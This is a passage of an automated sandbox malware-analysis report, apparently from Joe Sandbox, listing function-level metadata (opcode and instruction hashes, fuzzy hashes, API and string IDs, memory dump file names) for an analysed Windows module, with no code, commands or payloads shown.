                                                                                                                • Instruction Fuzzy Hash: 9F219077320A0647E74C8A38D83737532D1A705318F98A22DEA6BCE2C2D73AC457C385
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 94bd1a651729923c4c8d3d4bf4c81e233e4e8cf0a286e62590c7b03c1869421d
                                                                                                                • Instruction ID: c8f064e1fc8755d74177ad1ec8d0212b92d98aef6ef5eeb1086265e788cf89d2
                                                                                                                • Opcode Fuzzy Hash: 94bd1a651729923c4c8d3d4bf4c81e233e4e8cf0a286e62590c7b03c1869421d
                                                                                                                • Instruction Fuzzy Hash: 1B01E5556A6689C9D781DA79D890748FE80F756206F9CC3F4D0CCCBF42D689C58AC361
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                                                                                                • Instruction ID: 3773d387728c75306b403215c5a644438a4d98097765e89016f850f4d0ec0a57
                                                                                                                • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                                                                                                • Instruction Fuzzy Hash: 24018C72914A2E97DB289F48CC45136B390FB85312F49823AED879B385E735F970C6D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                                                                                                • Instruction ID: 3398a9a233cf60aa15e956728d2d676da06f536b9cb5e8dc57792be9be34c5e7
                                                                                                                • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                                                                                                • Instruction Fuzzy Hash: 87C08CB312810067C302EA25D8C0BAAF6A37360330F26CC3EA0A2F7E43C328C0A48111
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                                                                                                • API String ID: 3519838083-609671
                                                                                                                • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                                                                                • Instruction ID: 50ac734cac8246e8da6f1af02b3e0b317ea0584a80d71d183b017596bf46be98
                                                                                                                • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                                                                                • Instruction Fuzzy Hash: E3D1A071A0460AAFCB01DFA8D980BEEB7B9FF55308F218519E055B3A50DB70F949CB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: L$L'K$T'K$\'K$d'K$p'K$)K
                                                                                                                • API String ID: 3519838083-3887797823
                                                                                                                • Opcode ID: 47b27f50cc51f1a94238cd0256452db9f2d92a2e889979d702001e9d19a1f323
                                                                                                                • Instruction ID: ee28321b79d9216ae62b06da1fcd620e191e77883b893aad9196297db6ae1881
                                                                                                                • Opcode Fuzzy Hash: 47b27f50cc51f1a94238cd0256452db9f2d92a2e889979d702001e9d19a1f323
                                                                                                                • Instruction Fuzzy Hash: B202EF70A01249DFDB20CF54D990ADDBBB5BF1534CF5881AEC44AA7B40DB30AAC9CB65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9F3B74
                                                                                                                  • Part of subcall function 6C9F3AC2: __EH_prolog.LIBCMT ref: 6C9F3AC7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: DJ$H K$L K$P K$T K$X K$\ K
                                                                                                                • API String ID: 3519838083-3148776506
                                                                                                                • Opcode ID: 1e695b17fc03ab30503818bc101f4fbde075140751d540bd7eda0f269636307e
                                                                                                                • Instruction ID: b18a26f3cca0c63d6827f59119669d2f90044b8026b70f302c0eb548c0d7e99b
                                                                                                                • Opcode Fuzzy Hash: 1e695b17fc03ab30503818bc101f4fbde075140751d540bd7eda0f269636307e
                                                                                                                • Instruction Fuzzy Hash: 63518E35A041499BCF10DAB4C490AEEB37ABF6130CF20C52ACD715BA84DB78D94BC762
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $ $$ K$, K$.$o
                                                                                                                • API String ID: 3519838083-1786814033
                                                                                                                • Opcode ID: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                                                                                                • Instruction ID: fd08dc5e1eaf7fd9ddf57990858ec9af082782ad5d3648cb3f580f53983fb57f
                                                                                                                • Opcode Fuzzy Hash: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                                                                                                • Instruction Fuzzy Hash: 13D11671D042998BDF11CFA9C8947EEB7B6FF16308F24426AC471ABA41C771D946CBA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldiv$H_prolog
                                                                                                                • String ID: >WJ$x$x
                                                                                                                • API String ID: 2300968129-3162267903
                                                                                                                • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                                                                                                • Instruction ID: 0e7142ae11e4f0059d1ffa0c7d5ecff0955191d3c603174fb3ebe7929dd77dd7
                                                                                                                • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                                                                                                • Instruction Fuzzy Hash: AB127B71A00219EFDF10CFA4C880AEEBBB9FF58318F2481A9E915A7650C734DA45CF52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldiv$__aullrem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2022606265-0
                                                                                                                • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                                                                                • Instruction ID: b0f7c291ba999759b3c4f3c75c378569a0b560a8407c12e3038700c8a9a9c2c6
                                                                                                                • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                                                                                • Instruction Fuzzy Hash: 60218F70901619FFDF10CEA58D40DEF7A6DFF817A8F20C226B52472A90D6718D94D7A1
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9B86F1
                                                                                                                  • Part of subcall function 6C9C7173: __EH_prolog.LIBCMT ref: 6C9C7178
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9B88F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: IJ$WIJ$J
                                                                                                                • API String ID: 3519838083-740443243
                                                                                                                • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                                                                                • Instruction ID: 2dac994a7204faa35c084c5efab7dc5d703d170901e56c5fbe8b06aeedb94cb3
                                                                                                                • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                                                                                • Instruction Fuzzy Hash: FD71B530900295EFDB18DF94C484BEEB7F5BF28308F1084AAD8556BB51CB74EA49CB95
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA01853
                                                                                                                  • Part of subcall function 6CA015DF: __EH_prolog.LIBCMT ref: 6CA015E4
                                                                                                                  • Part of subcall function 6CA01943: __EH_prolog.LIBCMT ref: 6CA01948
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: ((K$<(K$L(K$\(K
                                                                                                                • API String ID: 3519838083-3238140439
                                                                                                                • Opcode ID: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                                                                                                • Instruction ID: d0212e2d75ef7def335ba0e47a9ae9626d107e660bc5fad1c8ef82d3b113c92d
                                                                                                                • Opcode Fuzzy Hash: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                                                                                                • Instruction Fuzzy Hash: 272148B0901B408EC724DF6AD5446DAFBF4AF64308F108A1FC09687B50DBB4AA48CB65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9CC41D
                                                                                                                  • Part of subcall function 6C9CCE40: __EH_prolog.LIBCMT ref: 6C9CCE45
                                                                                                                  • Part of subcall function 6C9CC8EB: __EH_prolog.LIBCMT ref: 6C9CC8F0
                                                                                                                  • Part of subcall function 6C9CC593: __EH_prolog.LIBCMT ref: 6C9CC598
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: &qB$0aJ$A0$XqB
                                                                                                                • API String ID: 3519838083-1326096578
                                                                                                                • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                                                                                • Instruction ID: 8c8862c4447b73464311a969bdd1e3e5cad505d8cd3835fbe688307d608a0c88
                                                                                                                • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                                                                                • Instruction Fuzzy Hash: 86217C71E01298EECB09DBE4D9819EDBBB4AF35308F20406ED81667781DB749E0DCB12
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: J$0J$DJ$`J
                                                                                                                • API String ID: 3519838083-2453737217
                                                                                                                • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                                                                                • Instruction ID: c5c169e779fd83da71404344c04e29f51935361a6953369b743ee8e7effd93d5
                                                                                                                • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                                                                                • Instruction Fuzzy Hash: 6811B0B0900BA4CEC7249F5AC55419AFBE4BFB5708B10C91FC4A687B50C7F8A549CB59
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $!$@
                                                                                                                • API String ID: 3519838083-2517134481
                                                                                                                • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                                                                                • Instruction ID: c7e944bc7e28431912e5c3fc46ad180a227bd8f59ecc584359d86abfa2b55f10
                                                                                                                • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                                                                                • Instruction Fuzzy Hash: D7129E70E0124ADFCB05CFA4C590AEDBBB5BF19308F148069E865ABB55D770E946CF90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__aulldiv
                                                                                                                • String ID: $SJ
                                                                                                                • API String ID: 4125985754-3948962906
                                                                                                                • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                                                                                • Instruction ID: d775999a116d20950daacec84a439fd693ae7ce425aa370cf21535b90a0ff9e9
                                                                                                                • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                                                                                • Instruction Fuzzy Hash: 5CB15CB1E00349DFCB14CF99C9909AEBBB5BF58314F20852ED419A7B50D730EA85CB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $CK$CK
                                                                                                                • API String ID: 3519838083-2957773085
                                                                                                                • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                                                                                • Instruction ID: bc32c1df28996c377513a5fce8bd54f999922b6c04bc6279136ad42e606f522c
                                                                                                                • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                                                                                • Instruction Fuzzy Hash: EF218E71F012458BCB14DFA985811FEF7B6AB94304F544A2AC422A3A91C774CA468EA3
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 0$LrJ$x
                                                                                                                • API String ID: 3519838083-658305261
                                                                                                                • Opcode ID: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                                                                                                • Instruction ID: bf63898538f2ed65e86d7ae797e691f111d941bb5bbbe5ffca478644a39581bc
                                                                                                                • Opcode Fuzzy Hash: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                                                                                                • Instruction Fuzzy Hash: 3821AC32D111199BCF04CBD8C991AEDB7B9EF68308F21016AE401B3740DB75EE09CBA1
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9D2ECC
                                                                                                                  • Part of subcall function 6C9BD58A: __EH_prolog.LIBCMT ref: 6C9BD58F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: :hJ$dJ$xJ
                                                                                                                • API String ID: 3519838083-2437443688
                                                                                                                • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                                                                                • Instruction ID: 9050f7703b6dcc9b2b56380911970335c5df9c5a3e4d3e3b85cb8f9546b8c1a2
                                                                                                                • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                                                                                • Instruction Fuzzy Hash: 5E21DAB0811B40CFC764CF6AC14429ABBF4BF29708B40C95EC4AA97B11D7B4A609CF59
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <J$DJ$HJ$TJ$]
                                                                                                                • API String ID: 0-686860805
                                                                                                                • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                                                                                • Instruction ID: 37ffe44c957ffea569322aba64a914cb756644e82ee2926af572b4ed4194ec07
                                                                                                                • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                                                                                • Instruction Fuzzy Hash: 8341B470D01289AFCF14DBE1D4908EEB778AF3130CB51816AD06227E50EB31E64ACB57
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldiv
                                                                                                                • String ID:
                                                                                                                • API String ID: 3732870572-0
                                                                                                                • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                                                                                • Instruction ID: 0e20940e51a7ef5fc38e745918f2627eef1f39989d55181c8a159fbfcececfa2
                                                                                                                • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                                                                                • Instruction Fuzzy Hash: 4A11C376300244BFEB244AA5DD80EBFBBBDEBD5704F10881DB15156A50C671AC488762
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9AC077
                                                                                                                  • Part of subcall function 6C9ABFF5: __EH_prolog.LIBCMT ref: 6C9ABFFA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: :$\
                                                                                                                • API String ID: 3519838083-1166558509
                                                                                                                • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                                                                                • Instruction ID: 6bdea3ff1e1746a8c6a2c34adfedc0ec9968b5d85aad1e45be1c6c6832b6ccb6
                                                                                                                • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                                                                                • Instruction Fuzzy Hash: B2E1EF309042499ECF15EFE8C890BEDBBB5BF2531CF104119E8516BA90DB72EA4BCB55
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: x'K$|'K
                                                                                                                • API String ID: 3519838083-1041342148
                                                                                                                • Opcode ID: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                                                                                                • Instruction ID: ee5a7a730b4ef1ade66303654f89e7cf1dce31a8d8744f1a1aea648cda8edcf6
                                                                                                                • Opcode Fuzzy Hash: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                                                                                                • Instruction Fuzzy Hash: CCD14C30B04745AACB21CFA0E490AFEB775BF2138CF24461ED16663E90D765E9CAC711
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
